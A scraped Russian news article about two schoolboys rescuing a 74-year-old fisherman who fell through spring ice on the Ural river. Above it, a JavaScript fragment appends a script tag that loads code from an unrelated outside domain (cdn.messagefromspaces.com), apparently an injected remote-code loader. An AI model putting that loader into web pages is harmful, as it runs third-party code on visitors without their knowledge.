, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

В Агаповском районе двое школьников вытащили из полыньи тонущего рыбака

Несмотря на предупреждения спасателей, на рыхлый весенний лед продолжают выходить любители рыбалки. Одним из них оказался 74-летний пенсионер из Агаповки Анатолий Макаров. В итоге ценой улова чуть не стала жизнь опрометчивого рыбака.

Пенсионер, несмотря на теплую погоду, отправился рыбачить на реку Урал. Он прошел по протоптанной другими рыбаками тропинке и устроился около лунки. Вечером Анатолий Константинович пошел с уловом домой, но провалился в воду на той самой тропинке, по которой пришел утром.

Было уже поздно и никого из рыбаков поблизости не оказалось. Когда мужчина уже был готов попрощаться с жизнью, он увидел на берегу две фигуры и начал кричать. Оказалось, что около реки гуляли два подростка: 13-летний Женя Тетерятников и 15-летний Данил Игошев. Услышав крики, ребята бросились на помощь рыбаку. Достать его из воды оказалось непростой задачей – лед вокруг полыньи трещал по швам. Спасти пенсионера удалось, только протянув ему рыбацкий бур.

Сейчас попавший в неприятность рыбак чувствует хорошо. Он сердечно поблагодарил своих юных спасителей. Несмотря на пережитое, Анатолий Константинович признался, что не сможет отказаться от рыбалки, но впредь будет осторожнее.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
11:47 - 24 марта 2014
|
автор: U-RSS
|
(486)
|
(0)

Комментарии (0)

Я человек
Я бот